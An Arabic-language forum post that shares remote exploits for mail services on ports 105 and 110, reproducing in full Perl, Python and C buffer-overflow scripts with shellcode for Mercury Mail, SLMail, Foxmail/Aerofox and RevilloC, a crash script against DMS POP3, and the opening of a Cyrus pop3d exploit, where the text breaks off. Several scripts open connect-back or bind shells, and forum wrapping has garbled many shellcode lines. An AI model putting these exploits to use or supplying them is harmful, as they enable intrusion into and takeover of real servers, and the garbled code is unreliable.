



اخلاقي تاج راسي
10-08-2013, 04:04 AM
بسم الله الرحمن الرحيم

السلام عليكم و رحمة الله و بركاته


إن شاء الله تكونوا في أفضل حال
أضع بين يديكم البورتات و ثغراتها
بورت 105 و 110 و 111 و 113

نبدأ بـ بورت 105

105 Mercury Mail Transport System 4.01b Remote Exploit (PH SERVER)



### mercury***ywarez
### Okayokay THiS iS 0DAY!!!
### Mercury Mail Transport System 4.01b REMOTE ROOT EXPLOIT
### (PH SERVER)
### since me and my folks didn't find enough wild targets,
### i release this pretty warez to the public :PP
### kcope [kingcope(at)gmx.net] in 2005! JUUAREZ!
### Big thanx to blackzero,revoguard,qobaiashi,unf,secrew!
###################################################################
use IO::Socket;
# 316 bytes
# Connect-back payload for the Mercury PH (port 105) overflow described in the
# header.  The caller-supplied IP and port are patched in at fixed offsets
# (111 and 118) further down.
# NOTE(review): as pasted from the forum, one escape per line carries a stray
# space (e.g. "\x 0B"), so this string no longer holds the bytes the author
# intended.  The script also runs without `use strict`/`use warnings`; every
# variable below is a package global.
$cbsc =
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x 0B\xC2\xE2\xFA"
."\xEB\x05\xE8\xEB\xFF\xFF\xFF"
."\x2B\x39\xC2\xC2\xC2\x9D\xA6\x63\xF2\xC2\xC2\xC2\x 49\x82\xCE\x49"
."\xB2\xDE\x6F\x49\xAA\xCA\x49\x35\xA8\xC6\x9B\x2A\x 59\xC2\xC2\xC2"
."\x20\x3B\xAA\xF1\xF0\xC2\xC2\xAA\xB5\xB1\xF0\x9D\x 96\x3D\xD4\x49"
."\x2A\xA8\xC6\x9B\x2A\x40\xC2\xC2\xC2\x20\x3B\x43\x 2E\x52\xC3\xC2"
."\xC2\x96\xAA\xC3\xC3\xC2\xC2\x3D\x94\xD2\x92\x92\x 92\x92\x82\x92"
."\x82\x92\x3D\x94\xD6\x49\x1A\xAA\xBD\xC2\xC2\xC3\x AA\xC0\xC2\xC2"
."\xF7\x49\x0E\xA8\xD2\x93\x91\x3D\x94\xDA\x47\x02\x B7\x88\xAA\xA1"
."\xAF\xA6\xC2\x4B\xA4\xF2\x41\x2E\x96\x4F\xFE\xE6\x A8\xD7\x9B\x69"
."\x20\x3F\x04\x86\xE6\xD2\x86\x3C\x86\xE6\xFF\x4B\x 9E\xE6\x8A\x4B"
."\x9E\xE6\x8E\x4B\x9E\xE6\x92\x4F\x86\xE6\xD2\x96\x 92\x93\x93\x93"
."\xA8\xC3\x93\x93\x3D\xB4\xF2\x93\x3D\x94\xC6\x49\x 0E\xA8\x3D\x3D"
."\xF3\x3D\x94\xCA\x91\x3D\x94\xDE\x3D\x94\xCE\x93\x 94\x49\x87\xFE"
."\x49\x96\xEA\xBA\xC1\x17\x90\x49\xB0\xE2\xC1\x37\x F1\x0B\x8B\x83"
."\x6F\xC1\x07\xF1\x19\xCD\x7C\xD2\xF8\x14\xB6\xCA\x 03\x09\xCF\xC1"
."\x18\x82\x29\x33\xF9\xDD\xB7\x25\x98\x49\x98\xE6\x C1\x1F\xA4\x49"
."\xCE\x89\x49\x98\xDE\xC1\x1F\x49\xC6\x49\xC1\x07\x 69\x9C\x9B\x01"
."\x2A\xC2\x3D\x3D\x3D\x4C\x8C\xCC\x2E\xB0\x3C\x71\x D4\x6F\x1B\xC7"
."\x0C\xBC\x1A\x20\xB1\x09\x2F\x3E\xF9\x1B\xCB\x37\x 6F\x2E\x3B\x68"
."\xA2\x25\xBB\x04\xBB";

# Target table: [ description, 4-byte return address ].  $numtargets must be
# kept in step with the number of entries by hand.
$numtargets = 1;

@targets =
(
["Mercury Mail Transport System 4.01b Win2k SP4/WinXP SP2", "\x83\xf2\x41\x00"]
);

print "Okayokay THiS iS 0DAY!!!\n";
print "Mercury Mail Transport System 4.01b REMOTE ROOT EXPLOIT\nkcope [kingcope(at)gmx.net] in 2005! JUUAREZ!\n";
print "Big thanx to blackzero,revoguard,qobaiashi,unf,secrew!\n";
# Usage check: exactly four arguments.  `ne` is a string comparison applied to
# a number; it works for small integers but `!=` is the idiomatic operator.
if ($#ARGV ne 3) {
print "usage: mecury***ywarez.pl target targettype yourip yourport\n\n";
for ($i=0; $i<$numtargets; $i++) {
print " [".$i."]...". $targets[$i][0]. "\n";
}
exit(0);
}

# Plain TCP connection to the PH service; die() fires if it cannot be opened.
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '105',
Proto => 'tcp') || die("Oh my godess! Port not open! Pleeze open and try again :PP");
# $tt indexes @targets and is not range-checked: an out-of-range value makes
# $ret undef below and the request is sent anyway.
$tt=$ARGV[1];
$cbip=$ARGV[2];
$cbport=$ARGV[3];

# gethostbyname() in scalar context yields the packed 4-byte address; each byte
# is XOR-ed with 0xc2 and written into the payload at offset 111.  A failed
# lookup returns undef, ord(undef) is 0, and four 0xc2 bytes are patched in
# without any error being reported.
($a1, $a2, $a3, $a4) = split(//, gethostbyname("$cbip"));
$a1 = chr(ord($a1) ^ 0xc2);
$a2 = chr(ord($a2) ^ 0xc2);
$a3 = chr(ord($a3) ^ 0xc2);
$a4 = chr(ord($a4) ^ 0xc2);
substr($cbsc, 111, 4, $a1 . $a2 . $a3 . $a4);

# Port, same encoding, at offset 118.  pack("s") uses the host's native byte
# order, so the bytes produced here depend on the machine running the script.
($p1, $p2) = split(//, reverse(pack("s", $cbport)));
$p1 = chr(ord($p1) ^ 0xc2);
$p2 = chr(ord($p2) ^ 0xc2);
substr($cbsc, 118, 2, $p1 . $p2);

# Request layout: 408 bytes of filler, the payload, four trailing bytes, the
# target's return address, a fixed marker string, then 440 more filler bytes.
# A PH query line of this size is far outside anything a client would send.
$pad="A" x 408 . $cbsc . "\x90\x90\xeb\x04";
$pad2="A" x 440;

$ret=$targets[$tt][1];
$x=$pad.$ret."JJJJKKKKLLLLMMMMNNNNOOOOPPPP\xe9\x87\xfe\xff\xff".$pad2;
print $sock "$x\r\n";

# Echo whatever the server sends until it closes the connection.  There is no
# timeout, so this blocks indefinitely if the service stays up but silent.
while (<$sock>) {
print;
}

# [2005-12-16]


انتهينا من بورت 105
نبدأ بـ بورت 110

110 SLMail 5.5 POP3 PASS Buffer Overflow Exploit



#########################################################
# #
# SLmail 5.5 POP3 PASS Buffer Overflow #
# Discovered by : Muts #
# Coded by : Muts #
# WWW.WHITEHAT.CO.IL #
# Plain vanilla stack overflow in the PASS command #
# #
#########################################################
# D:\Projects\BO>SLmail-5.5-POP3-PASS.py #
#########################################################
# D:\Projects\BO>nc -v 192.168.1.167 4444 #
# localhost.lan [192.168.1.167] 4444 (?) open #
# Microsoft Windows 2000 [Version 5.00.2195] #
# (C) Copyright 1985-2000 Microsoft Corp. #
# C:\Program Files\SLmail\System> #
#########################################################

import struct
import socket

# Python 2 script (print statement, byte strings).  Sends one oversized PASS
# line to a hard-coded lab host; the only feedback is a success/failure line.
print "\n\n############################################## #"
print "\nSLmail 5.5 POP3 PASS Buffer Overflow"
print "\nFound & coded by muts [at] whitehat.co.il"
print "\nFor Educational Purposes Only!"
print "\n\n############################################## #"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)


# Payload bytes.  NOTE(review): the forum's word-wrapping inserted a space
# into one escape per line (e.g. "\x 73"); that is not a valid escape in
# Python 2, so the source as pasted does not even compile.
sc = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x 73\x17\xe0\x66"
sc += "\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x 66\x4f\x97\xb6"
sc += "\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x 67\xf6\x49\xaa"
sc += "\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x 67\xf2\xf3\x1f"
sc += "\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\x a1\xf7\x30\xdb"
sc += "\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x 6a\x57\x49\xba"
sc += "\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x 39\x42\x9f\xbb"
sc += "\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x 6a\x97\x99\xfc"
sc += "\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\x b0\x95\x05\x61"
sc += "\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x 66\x1c\xc2\x70"
sc += "\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x 2f\x9a\x8b\x44"
sc += "\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x 8b\xe0\xf9\xb7"
sc += "\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\x b1\x95\x1d\x69"
sc += "\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x 99\x49\xc6\xb9"
sc += "\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x 56\x2d\x02\xb0"
sc += "\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x 57\xc7\x91\xb3"
sc += "\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x 33\x38\x91\xb7"
sc += "\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x 25\x51\x86\xe0"
sc += "\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x 3f\xef\x69\x67"
sc += "\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x 42\x20\xc3\xe1"
sc += "\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\x eb\x58\xe6\xf0"
sc += "\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x 99\x69\xc2\x88"
sc += "\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x 13\x1c\xaa\x4d"
sc += "\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x 99\xcf\x3d\x95"
sc += "\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x 99\xcc\xc2"

#Tested on Win2k SP4 Unpatched
# Change ret address if needed
# PASS argument: 4654 filler bytes, one little-endian 32-bit address, 32 bytes
# of 0x90, then the payload.  The address is specific to the build named above.
buffer = '\x41' * 4654 + struct.pack('<L', 0x783d6ddf) + '\x90'*32 + sc
try:
print "\nSending evil buffer..."
# Target is hard-coded rather than taken from the command line.
s.connect(('192.168.1.167',110))
data = s.recv(1024)
s.send('USER username' +'\r\n')
data = s.recv(1024)
s.send('PASS ' + buffer + '\r\n')
data = s.recv(1024)
s.close()
print "\nDone! Try connecting to port 4444 on victim machine."
# Bare except: every exception -- a refused connection, a reset during recv(),
# even KeyboardInterrupt -- is reported as "Could not connect", and the socket
# is never closed on this path.
except:
print "Could not connect to POP3!"

# [2004-11-18]


110 DMS POP3 Server (1.5.3 build 37) Buffer Overflow Exploit



#===== Start DMS_POP3_Overflow.pl =====
#
# Usage: DMS_POP3_Overflow.pl <ip> <port>
# DMS_POP3_Overflow.pl 127.0.0.1 110
#
# DMS POP3 Server for Windows 2000/XP 1.5.3 build 37
#
# Download:
# http://www.digitalmapping.sk.ca/pop3srv/default.asp
#
# Patch:
# http://www.digitalmapping.sk.ca/pop3srv/Update.asp
#
#####################################################

use IO::Socket;
use strict;

# Crash test (denial of service) against the DMS POP3 service at
# $ARGV[0]:$ARGV[1].  Neither argument is validated; with none given the
# constructor is called with undef and the "Cannot connect" branch is taken.
my($socket) = "";

# First connection: send an oversized USER line (no CR/LF, `x` binds tighter
# than `.`) and drop the connection without reading a reply.
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => $ARGV[1],
Proto => "TCP"))
{
print "Attempting to kill DMS POP3 service at $ARGV[0]:$ARGV[1]...";

sleep(1);

print $socket "USER " . "A" x 1023;

close $socket;

sleep(1);

# Second connection is a liveness probe: if the listener still accepts, the
# service survived.  This is only a heuristic -- a one-second window, a
# supervisor restarting the service, or a transient network error all change
# the verdict.  Note the inverted wording: "failed!" means the service is up.
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => $ARGV[1],
Proto => "TCP"))
{
close $socket;

print "failed!\n";
}
else
{
print "successful!\n";
}
}
else
{
print "Cannot connect to $ARGV[0]:$ARGV[1]\n";
}

# [2004-11-21]


110 Foxmail 1.1.0.1 POP3 Temp Dir Stack Overflow Exploit



#include <winsock.h>
#include <windows.h>
#include <stdio.h>
#include <conio.h>
#pragma comment (lib,"ws2_32")
#define PORT_OFFSET 118
#define IP_OFFSET 111

/* Connect-back payload.  main() patches the caller's port at PORT_OFFSET and
 * address at IP_OFFSET (each XOR-ed with 0x99 bytes) before copying it into
 * szUser.  NOTE(review): the forum's word-wrapping inserted a space into one
 * escape per line ("\x 0B"); "\x" with no hex digits is a compile error, so
 * this listing does not build as pasted. */
char Shellcode[] = "\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x 0B\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"
"\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9\x99\x99\x99\x 12\xD9\x95\x12"
"\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3\x9D\xC0\x71\x 02\x99\x99\x99"
"\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE\xEA\xAB\xC6\x CD\x66\x8F\x12"
"\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99\x7B\x60\x18\x 75\x09\x98\x99"
"\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF\x89\xC9\xC9\x C9\xC9\xD9\xC9"
"\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6\x99\x99\x98\x F1\x9B\x99\x99"
"\xAC\x12\x55\xF3\x89\xC8\xCA\x66\xCF\x81\x1C\x59\x EC\xD3\xF1\xFA"
"\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD\x14\xA5\xBD\x F3\x8C\xC0\x32"
"\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD\xBD\xA4\x10\x C5\xBD\xD1\x10"
"\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD\xBD\x89\xCD\x C9\xC8\xC8\xC8"
"\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66\xCF\x9D\x12\x 55\xF3\x66\x66"
"\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66\xCF\x95\xC8\x CF\x12\xDC\xA5"
"\x12\xCD\xB1\xE1\x9A\x4C\xCB\x12\xEB\xB9\x9A\x6C\x AA\x50\xD0\xD8"
"\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3\x4F\xED\x91\x 58\x52\x94\x9A"
"\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC3\x12\xC3\xBD\x 9A\x44\xFF\x12"
"\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D\x12\x9A\x5C\x 32\xC7\xC0\x5A"
"\x71\x99\x66\x66\x66\x17\xD7\x97\x75\xEB\x67\x2A\x 8F\x34\x40\x9C"
"\x57\xE7\x41\x7B\xEA\x52\x74\x65\xA2\x40\x90\x6C\x 34\x75\x60\x33"
"\xF9\x7E\xE0\x5F\xE0";

/* Oversized USER line.  Bytes from offset 244 onward are overwritten in main()
 * with an 8-byte block, a 17-byte stub and Shellcode.  NOTE(review): the same
 * wrapping put a stray space inside every line of this literal
 * ("...xyz12 34567890a"), which presumably shifts those offsets relative to the
 * author's original. */
char szUser[] = "user 1231231231231234567890abcdefghijklmnopqrstuvwxyz12 34567890a"
"bcdefghijklmnopqrstuvwxyz1234567890abcdefghijklmno pqrstuvwxyz123"
"4567890abcdefghijklmnopqrstuvwxyz1234567890abcdefg hijkklmnopqrst"
"uvwxyz1234567890abcdefghijkklmnopqrstuvwxyz1234567 890abcdAAAAijk"
"lmnopqrstuvwxyz1234567890abcdefghijklmnopqrstuvwxy z1234567890abc"
"defghijklmnopqrstuvwxyz1234567890abcdefghijklmnopq rstuvwxyz12345"
"67890abcdefghijklmnopqrstuvwxyz1234567890abcdefghi jklmnopqrstuvw"
"xyz1234567890abcdefghijklmnopqrstuvwxyz1234567890a bcdefghijklmno"
"pqrstuvwxyz1234567890abcdefghijklmnopqrstuvwxyz123 4567890abcdefg"
"hijklmnopqrstuvwxyz1234567890abcdefghijklmnopqrstu vwxyz123456789"
"0abcdefghijklmnopqrstuvwxyz1234567890abcdefghijklm nopqrstuvwxyz1"
"234567890abcdefghijklmnopqrstuvwxyz1234567890abcde fghijklmnopqrs"
"tuvwxyz1234567890abcdefghijklmnopqrstuvwxyz1234567 890abcdefghijk"
"lmnopqrstuvwxyz1234567890abcdefghijklmnopqrstuvwxy z1234567890abc"
"defghijklmnopqrstuvwxyz1234567890abcdefghijklmnopq rstuvwxyz12345"
"67890abcdefghijklmnopqrstuvwxyz1234567890abcdefghi jklmnopqrstuvw"
"xyz1234567890abcdefghijklmnopqrstuvwxyz1234567890a bcdefghijklmno"
"pqrstuvwxyz1234567890abcdefghijklmnopqrstuvwxyz123 4567890abcdefg"
"hijklmnopqrstuvwxyz\r\n";
/* Second line sent after USER.  Declared unsigned char; main() casts it back
 * to char* for SlowSend(). */
unsigned char szPass[] = "pass siglos\r\n";

/* Print banner and usage, then terminate.  Reached from main() on a bad
 * argument count, yet exits with status 0, so a caller cannot tell a usage
 * error from success.  The banner names "Aerofox Mail Server" while the
 * post's title says Foxmail; the 0x7ffa1571 mentioned here is the value
 * main() writes into szUser. */
void help(char *program)
{
printf ("================================================== ======\r\n");
printf ("Aerofox Mail Server 1.1.0.1 POP3 Temp Dir Stack Overflow\r\n");
printf ("================================================== ======\r\n\r\n");
printf ("Usage: %s <Host> <Your IP> <Your port>\r\n", program);
printf ("e.g.:\r\n");
printf (" %s 127.0.0.1 202.119.9.42 8111\r\n", program);
printf ("\r\n The ret address is 0x7ffa1571.\r\n");
exit(0);
}

/* Resolve u_host and open a TCP connection to u_port.
 *
 * Returns the connected socket.  On WSAStartup, lookup or socket() failure it
 * returns -1 (which becomes INVALID_SOCKET in the unsigned SOCKET type) but
 * on a failed connect() it calls exit() directly -- two different error
 * conventions, and main() checks neither.  Winsock is left initialised on
 * every error path.
 * NOTE(review): the "= =" on the socket() line is a forum artefact ("=="
 * split by word-wrapping); as pasted this is a syntax error. */
SOCKET Connect(char *u_host ,unsigned short u_port)
{
WSADATA wsaData;
SOCKET sock;
struct hostent *r;
struct sockaddr_in r_addr;
int timeout = 1000; /* receive timeout in milliseconds, see SO_RCVTIMEO below */

if(WSAStartup(0x0101,&wsaData) != 0)
{
printf("error starting winsock..");
return -1;
}
if((r=gethostbyname(u_host))== NULL)
{
return -1 ;
}
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))= = INVALID_SOCKET)
{
return -1 ;
}
r_addr.sin_family=AF_INET;
r_addr.sin_port=htons(u_port);
r_addr.sin_addr=*((struct in_addr*)r->h_addr);

if(connect(sock,(struct sockaddr *)&r_addr,sizeof(r_addr))==SOCKET_ERROR)
{
printf("Can't connect\n");
exit(-1);
}
/* 1 s receive timeout so the recv() in tr() does not block forever on a
 * server that stops answering. */
setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO, (char*)&timeout,sizeof(timeout));
return(sock);
}

/* Close the socket and tear down Winsock (pairs with the WSAStartup in
 * Connect()).  Return values of both calls are ignored. */
void Disconnect(SOCKET s)
{
closesocket(s);
WSACleanup();
}

/* Read one chunk of server output and print it as a string.
 *
 * The recv() result is not checked: on timeout or error the zeroed buffer
 * prints as an empty line, and a full 1500-byte read leaves no terminating
 * NUL, so printf("%s") reads past the end of buff. */
void tr(SOCKET s)
{
char buff[1500];
memset(buff, 0, sizeof(buff));
recv(s, buff, sizeof(buff), 0);
printf("%s\r\n",buff);
}

/* Send buf one byte at a time, pausing p milliseconds before each byte and
 * echoing it to stdout.
 *
 * The length comes from strlen(), so the transfer stops at the first NUL
 * byte regardless of how many bytes main() copied into szUser; strlen() is
 * also re-evaluated on every iteration.  send() return values are ignored.
 * The commented-out send() would have used sizeof(buf) -- the size of a
 * pointer, not of the data -- which is presumably why it was replaced. */
void SlowSend(SOCKET s, char *buf, int p)
{
//send(s, buf, sizeof(buf),0);
//send(s, "\r\n", 2,0);
for(unsigned int i = 0; i < strlen(buf); i++)
{
Sleep(p);
printf("%c", buf[i]);
send(s, (char*)&(buf[i]), 1, 0);
}
}

/* Entry point: argv[1] target host, argv[2] callback IP, argv[3] callback
 * port.  `void main` is non-standard and, together with help()'s exit(0),
 * means the process status never reflects a failure.  The commented-out
 * _asm block is an unused inline-assembly fragment left by the author. */
void main(int argc, char *argv[])
{
/*_asm{
mov eax,90909091h
dec eax
a: dec ebx
cmp [ebx], eax
jnz a
push ebx
ret
}*/
if(argc != 4)
help(argv[0]);

unsigned short port;
unsigned long ip;

/* Callback endpoint, XOR-ed with 0x99 bytes and patched into the payload at
 * the two offsets.  inet_addr() returns INADDR_NONE for a malformed address
 * and that value is patched in unchecked; atoi() likewise accepts junk. */
port = htons(atoi(argv[3]))^(USHORT)0x9999;
ip = inet_addr(argv[2])^(ULONG)0x99999999;
memcpy(&Shellcode[PORT_OFFSET], &port, 2);
memcpy(&Shellcode[IP_OFFSET], &ip, 4);

/* Connect() may return INVALID_SOCKET (or exit); s is used regardless. */
SOCKET s = Connect(argv[1], 110);
tr(s);
/* Overwrite szUser from offset 244: an 8-byte block that contains the
 * 0x7ffa1571 value quoted in help() (little-endian), a 17-byte stub, then
 * the payload without its terminating NUL.  The stub literal carries the
 * same forum-inserted space ("\x C3") as the other byte strings. */
memcpy(szUser + 244, "\xCC\x90\xEB\x04\x71\x15\xFA\x7F", 8);
memcpy(szUser + 244 + 8, "\xB8\x91\x90\x90\x90\x48\x4B\x39\x03\x75\xFB\x53\x C3\x90\x90\x90\x90", 17);
memcpy(szUser + 244 + 8 + 17, Shellcode, sizeof(Shellcode) - 1);

/* Drip-feed the USER line (1 ms per byte), wait for a keypress, read the
 * reply, then send PASS at 100 ms per byte. */
SlowSend(s, (char*)szUser, 1);
getch();
tr(s);
SlowSend(s, (char*)szPass, 100);
tr(s);
Disconnect(s);
return;
}

// [2005-03-02]


110 RevilloC MailServer 1.21 (USER) Remote Buffer Overflow Exploit PoC



#!/usr/bin/perl -w
#revilloC mail server PoC exploit ( for xp sp1)
# Discovered securma massine from MorX Security Research Team (http://www.morx.org).
#RevilloC is a MailServer and Proxy v 1.21 (http://www.revilloC.com)
#The mail server is a central point for emails coming in and going out from home or office
#The service will work with any standard email client that supports POP3 and SMTP.
#by sending a large buffer after USER commands
#C:\>nc 127.0.0.1 110
#+OK RevilloC POP3 Ready
#USER "A" x4081 + "\xff"x4 + "\xdd"x4 + "\x0d\x0a" (xp sp2)
#we have:
#access violation when reading [dddddddd].
#ntdll!wcsncat+0x387:
#7C92B3FB 8B0B MOV ECX,DWORD PTR DS:[EBX] --->EBX pointe to "\xdd"x4
#ECX dddddddd
#EAX FFFFFFFF
#Vendor contacted 14/01/2006 , No response,No patch.
#this entire document is for educational, testing and demonstrating purpose only.
#greets all MorX members,undisputed,sara
#!/usr/bin/perl -w
use IO::Socket;
# Proof of concept for the RevilloC POP3 USER overflow described in the
# header.  No `use strict`/`use warnings`: every variable is a package global.
# Only the target host is taken from the command line.
if ($#ARGV<0)
{
print "\n write the target IP!! \n\n";
exit;
}

# Payload bytes.  NOTE(review): the forum's word-wrapping inserted a space
# into one escape per line ("\x 83"), so the string does not hold the bytes
# the author intended.
$shellcode = "\xEB\x03\x5D\xEB\x05\xE8\xF8\xFF\xFF\xFF\x8B\xC5\x 83\xC0\x11\x33".
"\xC9\x66\xB9\xC9\x01\x80\x30\x88\x40\xE2\xFA\xDD\x 03\x64\x03\x7C".
"\x09\x64\x08\x88\x88\x88\x60\xC4\x89\x88\x88\x01\x CE\x74\x77\xFE".
"\x74\xE0\x06\xC6\x86\x64\x60\xD9\x89\x88\x88\x01\x CE\x4E\xE0\xBB".
"\xBA\x88\x88\xE0\xFF\xFB\xBA\xD7\xDC\x77\xDE\x4E\x 01\xCE\x70\x77".
"\xFE\x74\xE0\x25\x51\x8D\x46\x60\xB8\x89\x88\x88\x 01\xCE\x5A\x77".
"\xFE\x74\xE0\xFA\x76\x3B\x9E\x60\xA8\x89\x88\x88\x 01\xCE\x46\x77".
"\xFE\x74\xE0\x67\x46\x68\xE8\x60\x98\x89\x88\x88\x 01\xCE\x42\x77".
"\xFE\x70\xE0\x43\x65\x74\xB3\x60\x88\x89\x88\x88\x 01\xCE\x7C\x77".
"\xFE\x70\xE0\x51\x81\x7D\x25\x60\x78\x88\x88\x88\x 01\xCE\x78\x77".
"\xFE\x70\xE0\x2C\x92\xF8\x4F\x60\x68\x88\x88\x88\x 01\xCE\x64\x77".
"\xFE\x70\xE0\x2C\x25\xA6\x61\x60\x58\x88\x88\x88\x 01\xCE\x60\x77".
"\xFE\x70\xE0\x6D\xC1\x0E\xC1\x60\x48\x88\x88\x88\x 01\xCE\x6A\x77".
"\xFE\x70\xE0\x6F\xF1\x4E\xF1\x60\x38\x88\x88\x88\x 01\xCE\x5E\xBB".
"\x77\x09\x64\x7C\x89\x88\x88\xDC\xE0\x89\x89\x88\x 88\x77\xDE\x7C".
"\xD8\xD8\xD8\xD8\xC8\xD8\xC8\xD8\x77\xDE\x78\x03\x 50\xDF\xDF\xE0".
"\x8A\x88\xAB\x6F\x03\x44\xE2\x9E\xD9\xDB\x77\xDE\x 64\xDF\xDB\x77".
"\xDE\x60\xBB\x77\xDF\xD9\xDB\x77\xDE\x6A\x03\x58\x 01\xCE\x36\xE0".
"\xEB\xE5\xEC\x88\x01\xEE\x4A\x0B\x4C\x24\x05\xB4\x AC\xBB\x48\xBB".
"\x41\x08\x49\x9D\x23\x6A\x75\x4E\xCC\xAC\x98\xCC\x 76\xCC\xAC\xB5".
"\x01\xDC\xAC\xC0\x01\xDC\xAC\xC4\x01\xDC\xAC\xD8\x 05\xCC\xAC\x98".
"\xDC\xD8\xD9\xD9\xD9\xC9\xD9\xC1\xD9\xD9\x77\xFE\x 4A\xD9\x77\xDE".
"\x46\x03\x44\xE2\x77\x77\xB9\x77\xDE\x5A\x03\x40\x 77\xFE\x36\x77".
"\xDE\x5E\x63\x16\x77\xDE\x9C\xDE\xEC\x29\xB8\x88\x 88\x88\x03\xC8".
"\x84\x03\xF8\x94\x25\x03\xC8\x80\xD6\x4A\x8C\x88\x DB\xDD\xDE\xDF".
"\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D\xF0\x8B\x 5D\x03\xC2\x90".
"\x03\xD2\xA8\x8B\x55\x6B\xBA\xC1\x03\xBC\x03\x8B\x 7D\xBB\x77\x74".
"\xBB\x48\x24\xB2\x4C\xFC\x8F\x49\x47\x85\x8B\x70\x 63\x7A\xB3\xF4".
"\xAC\x9C\xFD\x69\x03\xD2\xAC\x8B\x55\xEE\x03\x84\x C3\x03\xD2\x94".
"\x8B\x55\x03\x8C\x03\x8B\x4D\x63\x8A\xBB\x48\x03\x 5D\xD7\xD6\xD5".
"\xD3\x4A\x8C\x88";
# 3601 bytes of 0x90 precede the payload in the USER argument.
$buffer = "\x90"x3601;
$eax ="\x83\xb5\x19\x01"; # change if needed
$peb= "\x20\xf0\xfd\x7f"; #PEB lock
$user ="USER ";
$enter = "\x0d\x0a";
# Connect to port 110 on the host given as the only argument.
$connect = IO::Socket::INET ->new (Proto=>"tcp",
PeerAddr=> "$ARGV[0]",
PeerPort=>"110"); unless ($connect) { die "cant connect" }
print "\nRevilloC mail server remote PoC exploit by securma massine\n";
print "\nsecurma\@morx.org\n";
print "\n+++++++++++www.morx.org++++++++++++++++\n";
# Read up to 128 bytes of greeting, then send the single USER line.  The
# "[+] Sent USER" message is printed before the send actually happens.
$connect->recv($text,128);
print "$text\n";
print "[+] Sent USER\n";
$connect->send($user . $buffer . $shellcode . $eax . $peb . $enter);
# No reply is read after the send and the socket is only closed at exit.
# Port 9191 is whatever the payload is said to open; nothing in this listing
# shows it.
print "[+] Sent shellcode..telnet to victim host port 9191\n";

# [2006-03-07]


110 Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit



/* zeroday warez
* !!! PRIVATE - DONT DISTRIBUTE - PRIVATE !!!
*********************************************
* cyruspop3d.c - cyrus pop3d remote exploit by kcope
* tested on cyrus-imapd-2.3.2,linux
*
* bug found 23 Apr 2006 by kcope
*--------------------------------------------
*
* imapd/pop3d.c line 1830 :
* char userbuf[MAX_MAILBOX_NAME+1], *p;
* ...
* if (!ulen) ulen = strlen(user);
* if (config_getswitch(IMAPOPT_POPSUBFOLDERS)) {
* memcpy(userbuf, user, ulen);
* userbuf[ulen] = '\0';
* ...
* popsubfolders has to be enabled
*
* thnx to blackzero revoguard wY! qobaiashi bogus alex
* Love to Lisa :-)
*********************************************
* !!! PRIVATE - DONT DISTRIBUTE - PRIVATE !!!
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/time.h>
#include <unistd.h>
#include <netdb.h>
#include <errno.h>

#define POP3PORT 110
#define BINDPORT 13370

/* Payload placed inside the USER argument by do_exploit().  main() probes
